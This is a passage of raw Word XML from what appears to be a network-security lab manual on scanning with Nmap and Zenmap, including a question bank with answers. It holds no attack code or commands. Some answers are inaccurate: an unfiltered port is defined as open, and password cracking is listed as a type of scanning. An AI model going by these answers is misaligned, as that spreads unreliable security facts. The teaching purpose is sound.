            </w:r>
            <w:r w:rsidR="00F501C9" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06B3BDDE" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A90352" w:rsidRPr="001C411D" w14:paraId="3771CF7E" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="470C10FC"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063C1997" w14:textId="77777777" w:rsidR="002C63F7" w:rsidRPr="001C411D" w:rsidRDefault="002C63F7" w:rsidP="002C63F7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A1F4C63" w14:textId="44EA18CF" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Perform Network Scanning using NMAP and ZENMAP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DC270E5" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A90352" w:rsidRPr="001C411D" w14:paraId="1A612CD3" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2431E77F"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298ABAFF" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4A348388" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E"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Active reconnaissance is commonly referred to as </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>scanning</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BA6C967" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E"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Taking the information discovered during reconnaissance and using it to examine the network.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28895BD2" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E"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The process of scanning perimeter and internal network devices for weaknesses.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3894543E" w14:textId="0856BEA1" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="002E7D0E">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Looking for information that can help to perpetrate attack</w:t>
            </w:r>
            <w:r w:rsidR="00420606" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D7096E8" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="535A0797" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C984065" wp14:editId="07EB4560">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-40005</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="page">
                    <wp:posOffset>488950</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5924550" cy="2590800"/>
                  <wp:effectExtent l="0" t="0" r="0" b="19050"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="29" name="Diagram 29">
                    <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0786A734-C254-43FB-B2BB-129D84BFB6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3FE2065F" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D1B2E2C" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76C728A5" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="516F39E7" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="330D256A" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A90352" w:rsidRPr="001C411D" w14:paraId="0E0EB9CF" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D0161E9"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lastRenderedPageBreak/>
              <w:t>Question Bank:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5915F784" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3AC574EB" w14:textId="7D6E9412" w:rsidR="001B02F5" w:rsidRPr="001C411D" w:rsidRDefault="001B02F5" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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How to find the</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> network addresses of live hosts, firewalls, routers, etc</w:t>
            </w:r>
            <w:r w:rsidR="00420606" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A3C6EA2" w14:textId="77777777" w:rsidR="00420606" w:rsidRPr="001C411D" w:rsidRDefault="00420606" w:rsidP="00736145">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>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To find the network addresses of live hosts, firewalls, routers, etc, you can use a variety of network scanning tools such as Nmap, Angry IP Scanner, or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Fing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>. These tools can scan your local network or remote networks to discover active hosts and their associated IP addresses, open ports, operating systems, and other useful information. It is important to note that network scanning can be intrusive and may violate security policies and laws, so it is important to obtain proper authorization before performing any network scans.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11EF7FB1" w14:textId="77777777" w:rsidR="00DF1414" w:rsidRPr="001C411D" w:rsidRDefault="00DF1414" w:rsidP="00DF1414">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="44233FC6" w14:textId="77777777" w:rsidR="001B02F5" w:rsidRPr="001C411D" w:rsidRDefault="001B02F5" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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In which </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">phase where attacker will </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">interact with the target </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>with an aim to identify the vulnerabilities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="222FC04F" w14:textId="77777777" w:rsidR="00420606" w:rsidRPr="001C411D" w:rsidRDefault="00420606" w:rsidP="00736145">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>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The phase where an attacker interacts with the target with the aim of identifying vulnerabilities is called the reconnaissance phase. This is often the first step in a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>cyber attack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>, where the attacker tries to gather information about the target's network, systems, and applications. This can involve scanning for open ports and services, performing web application reconnaissance, social engineering, or other techniques that can help the attacker identify potential vulnerabilities that can be exploited in a later stage of the attack.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="390FFF7B" w14:textId="77777777" w:rsidR="00DF1414" w:rsidRPr="001C411D" w:rsidRDefault="00DF1414" w:rsidP="00DF1414">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1752780F" w14:textId="77777777" w:rsidR="001B02F5" w:rsidRPr="001C411D" w:rsidRDefault="001B02F5" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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Differentiate between static and dynamic analysis.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49DEBF6A" w14:textId="77777777" w:rsidR="00420606" w:rsidRPr="001C411D" w:rsidRDefault="00420606" w:rsidP="00736145">
            <w:pPr>
              <w:ind w:left="720"/>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Static analysis and dynamic analysis are two different approaches to software testing and security testing. Static analysis involves </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>analyzing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> code or software without actually executing it, using techniques such as code review, syntax analysis, and data flow </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>analysis. Static analysis can detect certain types of security issues, such as buffer overflows, injection vulnerabilities, and race conditions, but it may miss other types of issues that can only be detected by executing the code in a runtime environment.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01622D70" w14:textId="77777777" w:rsidR="00420606" w:rsidRPr="001C411D" w:rsidRDefault="00420606" w:rsidP="00736145">
            <w:pPr>
              <w:ind w:left="720"/>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Dynamic analysis, on the other hand, involves executing the code or software in a runtime environment and observing its </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>behavior</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>, including its input and output. Dynamic analysis can detect certain types of issues that are difficult to detect with static analysis, such as logic flaws, authentication and authorization issues, and timing attacks. However, dynamic analysis can be more time-consuming and resource-intensive than static analysis, and it may not detect certain types of vulnerabilities that are only present in specific environments or configurations.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54D7D745" w14:textId="459B21AF" w:rsidR="00FD320D" w:rsidRPr="001C411D" w:rsidRDefault="00FD320D" w:rsidP="00FD320D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51D484DB" w14:textId="63FF511E" w:rsidR="001B02F5" w:rsidRPr="001C411D" w:rsidRDefault="001B02F5" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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Explain the different types of scanning.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27F65751" w14:textId="77777777" w:rsidR="00420606" w:rsidRPr="001C411D" w:rsidRDefault="00420606" w:rsidP="00736145">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Scanning is the process of checking a network, system, or application for vulnerabilities or weaknesses. There are several types of scanning, including:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="308097AB" w14:textId="77777777" w:rsidR="00420606" w:rsidRPr="001C411D" w:rsidRDefault="00420606" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="25"/>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Port scanning: checking for open ports and services on a target system or network.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50473B69" w14:textId="77777777" w:rsidR="00420606" w:rsidRPr="001C411D" w:rsidRDefault="00420606" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="25"/>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Vulnerability scanning: checking for known vulnerabilities in a system or application using a database of known security issues and exploits.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57BEFF23" w14:textId="77777777" w:rsidR="00420606" w:rsidRPr="001C411D" w:rsidRDefault="00420606" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="25"/>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Network mapping: creating a map of the target network, including the devices and their relationships to each other.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="554ED34E" w14:textId="77777777" w:rsidR="00420606" w:rsidRPr="001C411D" w:rsidRDefault="00420606" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="25"/>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Web application scanning: checking for vulnerabilities in web applications, such as SQL injection, cross-site scripting, and other common web application vulnerabilities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C0D3F43" w14:textId="77777777" w:rsidR="00420606" w:rsidRPr="001C411D" w:rsidRDefault="00420606" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="25"/>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Password cracking: attempting to crack passwords using brute-force or dictionary attacks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03E38793" w14:textId="77777777" w:rsidR="00DF1414" w:rsidRPr="001C411D" w:rsidRDefault="00DF1414" w:rsidP="00736145">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="73FAC921" w14:textId="77777777" w:rsidR="00DF1414" w:rsidRPr="001C411D" w:rsidRDefault="00DF1414" w:rsidP="00DF1414">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60F9A23E" w14:textId="77777777" w:rsidR="001B02F5" w:rsidRPr="001C411D" w:rsidRDefault="001B02F5" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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Differentiate between filtered and unfiltered ports.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A2D99C8" w14:textId="77777777" w:rsidR="00420606" w:rsidRPr="001C411D" w:rsidRDefault="00420606" w:rsidP="00736145">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Filtered and unfiltered ports are two different states that a port can be in on a network device, such as a router, firewall, or server.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="727170EF" w14:textId="77777777" w:rsidR="00420606" w:rsidRPr="001C411D" w:rsidRDefault="00420606" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="26"/>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Unfiltered ports: a port that is open and accepting connections.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05067484" w14:textId="77777777" w:rsidR="00420606" w:rsidRPr="001C411D" w:rsidRDefault="00420606" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
